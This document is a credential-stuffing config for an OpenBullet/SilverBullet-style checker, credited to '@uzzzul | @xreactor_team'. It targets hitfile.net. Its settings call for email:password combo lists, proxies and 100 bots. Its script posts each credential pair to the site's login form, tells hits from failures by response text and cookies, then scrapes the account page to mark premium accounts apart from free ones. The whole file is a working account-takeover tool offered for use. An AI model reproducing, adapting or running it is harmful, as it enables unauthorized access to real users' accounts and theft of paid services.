[SETTINGS]
{
  "Name": "hitfile | xreactor.org",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2022-01-27T19:47:00.9903916+02:00",
  "AdditionalInfo": "for more onfigs : xreactor.org",
  "RequiredPlugins": [],
  "Author": "@uzzzul | @xreactor_team",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "MailPass",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "hitfile ",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#LOGIN REQUEST POST "https://hitfile.net/user/login" 
  CONTENT "user%5Blogin%5D=<USER>&user%5Bpass%5D=<PASS>&user%5Bsubmit%5D=Log+in&user%5Bmemory%5D=on" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: hitfile.net" 
  HEADER "Origin: https://hitfile.net" 
  HEADER "Referer: https://hitfile.net/login" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Sec-Fetch-User: ?1" 
  HEADER "Sec-GPC: 1" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "User-Agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Mobile Safari/537.36" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "E-Mail address appears to be invalid. Please try again" 
    KEY "Incorrect login or password" 
  KEYCHAIN Success OR 
    KEY "<COOKIES{*}>" Contains "user_isloggedin" 

#CAPTURE REQUEST GET "https://hitfile.net/premium?gaid=head" 
  
  HEADER "Host: hitfile.net" 
  HEADER "Referer: https://hitfile.net/user/files" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Sec-Fetch-User: ?1" 
  HEADER "Sec-GPC: 1" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "User-Agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Mobile Safari/537.36" 

#PLAN PARSE "<SOURCE>" LR "Account: <b>" "</b>" CreateEmpty=FALSE -> CAP "PLAN" 

#FREE KEYCHECK 
  KEYCHAIN Custom "FREE" OR 
    KEY "<PLAN>" Contains "free" 
  KEYCHAIN Success OR 
    KEY "<PLAN>" DoesNotContain "free" 

#author FUNCTION Constant "@uzzzul | @xreactor_team" -> CAP "configby" 

